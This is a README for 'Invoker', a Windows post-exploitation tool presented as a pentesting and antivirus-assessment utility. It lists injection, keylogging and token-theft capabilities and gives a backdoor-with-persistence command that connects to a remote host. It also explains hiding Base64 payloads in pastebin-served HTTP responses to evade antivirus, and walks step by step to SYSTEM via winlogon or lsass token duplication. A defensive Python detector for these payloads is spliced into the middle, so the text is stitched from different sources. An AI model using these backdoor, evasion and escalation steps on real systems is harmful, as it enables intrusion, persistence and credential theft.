Penetration testing utility and antivirus assessment tool.
The main goal is to use this tool when access to some Windows OS features through the GUI is restricted.
Built with Dev-C++ IDE v5.11 (64-bit), compiled with TDM-GCC v4.9.2 (32-bit and 64-bit) and tested on Windows 10 Enterprise OS (64-bit). Download Dev-C++ from here.
NEW: Visual Studio Community 2019 v16.7.6 projects added.
Dev-C++ project with C++03 standard is somehow stealthier than Visual Studio project with C++11 standard.
Made for educational purposes. I hope it will help!
Future plans:
- Direct System Calls,
- DLL Proxying,
- COM Hijacking.
Contents:
- Invoker Library
- How to Run
- Bytecode Injection
- Generate a Reverse Shell Payload
- PowerShell Scripts
- Make a DLL With a Hook Procedure
- Get the LocalSystem Account (NT AUTHORITY\SYSTEM)
- Images
Capabilities:
- invoke the Command Prompt and PowerShell,
- download a file,
- add a registry key,
- schedule a task,
- Windows Management Instrumentation (WMI),
- connect to a remote host,
- terminate a running process,
- run a new process,
- dump a process memory,
- inject a bytecode into a running process,
- inject a DLL into a running process,
- list DLLs of a running process,
- install a hook procedure,
- enable access token privileges,
- duplicate the access token of a running process,
- list unquoted service paths and restart a running service,
- replace Sticky Keys.
Some features may require administrative privileges.
Check the library here. Feel free to use it!
Run \exec\Invoker_x86.exe (32-bit) or \exec\Invoker_x64.exe (64-bit).
To automate the backdoor while setting up persistence, run the following command:
Invoker_x64.exe 192.168.8.5 9000
32-bit Invoker can only:
- dump the memory of a 32-bit process,
- inject a 32-bit bytecode into a 32-bit process,
- inject a 32-bit DLL into a 32-bit process,
- list DLLs of a 32-bit process,
- install a hook procedure from a 32-bit DLL.
64-bit Invoker can only:
- dump the memory of a 32-bit process,
- dump the memory of a 64-bit process,
- inject a 32-bit bytecode into a 32-bit process,
- inject a 64-bit bytecode into a 64-bit process,
- inject a 32-bit DLL into a 32-bit process,
- inject a 64-bit DLL into a 64-bit process,
- list DLLs of a 32-bit process,
- list DLLs of a 64-bit process,
- install a hook procedure from a 32-bit DLL,
- install a hook procedure from a 64-bit DLL.
Elevate privileges by injecting bytecode into a higher-privileged process.
This tool can parse an HTTP response and extract the payload from a custom element, e.g. from <invoker>payload</invoker>, where payload is a binary code/file encoded in Base64.
Check the example at pastebin.com/raw/xf9Trt0d.
This might be useful if an antivirus is constantly deleting your local payloads.
Also, check an additional example at pastebin.com/raw/iW17rCxH.
P.S. Bytecode provided will most certainly not work for you.
Use ngrok to give your local web server a public address.
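As an added example that is not part of the Invoker project, the following Python check scans a captured HTTP response for the custom <invoker> element described above and reports every element whose content is valid Base64, with a hint whether the decoded bytes look like a Windows PE image. The tag name comes from this README; the sample response, the field names and the PE-header heuristic are constructed here.

```python
import base64
import binascii
import re

# The <invoker>...</invoker> element is the format the Invoker README describes;
# the detection heuristics and the sample response below are constructed for this example.
INVOKER_RE = re.compile(r"<invoker>\s*([A-Za-z0-9+/=\s]+?)\s*</invoker>",
                        re.IGNORECASE | re.DOTALL)


def find_invoker_payloads(body: str) -> list[dict]:
    """Return one finding per <invoker> element whose content is valid Base64.

    Elements that match the tag but do not decode are skipped: they are not
    something the tool could consume, so they are noise for this rule.
    """
    findings = []
    for match in INVOKER_RE.finditer(body):
        blob = re.sub(r"\s+", "", match.group(1))  # tolerate wrapped Base64
        try:
            decoded = base64.b64decode(blob, validate=True)
        except binascii.Error:
            continue
        findings.append({
            "offset": match.start(),
            "encoded_len": len(blob),
            "decoded_len": len(decoded),
            # 'MZ' is the magic of a Windows PE image (EXE/DLL): a strong triage signal.
            "looks_like_pe": decoded[:2] == b"MZ",
        })
    return findings


# Constructed HTTP response: one PE-looking blob, one non-Base64 element, one small text blob.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><body><p>Nothing to see here.</p>"
    "<invoker>" + base64.b64encode(b"MZ" + b"\x00" * 30).decode() + "</invoker>"
    "<invoker>abc</invoker>"
    "<invoker>aGVsbG8gd29ybGQ=</invoker>"
    "</body></html>"
)

if __name__ == "__main__":
    for finding in find_invoker_payloads(SAMPLE_RESPONSE):
        print(finding)
```

The same function can be pointed at proxy logs or saved responses; a finding with looks_like_pe set is the case worth escalating first.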
To see if a process is 32-bit or 64-bit, open Task Manager -> click on More details -> go to the Details tab -> right click on any of the columns -> click on Select columns -> check the Platform checkbox.
Additionally, to see if a process is running with administrative privileges, check the Elevated checkbox.
Find out how to generate a reverse shell payload from my other project, as well as how to set up Ncat and multi/handler listeners.
Check all the PowerShell scripts used in the main C++ program here.
Find out how to make a DLL with a hook procedure here. The hook procedure will invoke a message box on each window close.
Also, check out a keyboard hook procedure here.
Make sure to remove all the created artifacts after you are done testing, e.g. remove keylogger.log.
Run the Invoker as administrator.
Enable all access token privileges.
Duplicate the access token from e.g. Windows Logon Application (winlogon.exe) and run a new instance of the Invoker.
Within the new Invoker instance, open the Command Prompt and run whoami; you should now see nt authority\system.
Enable all access token privileges once again.
Close the old Invoker instance.
P.S. You get more access token privileges from Local Security Authority Subsystem Service (lsass.exe).
Figure 1 - Invoker
Figure 2 - Add/Edit Registry Key
Figure 3 - Bytecode Injection
Figure 4 - Elevated Privileges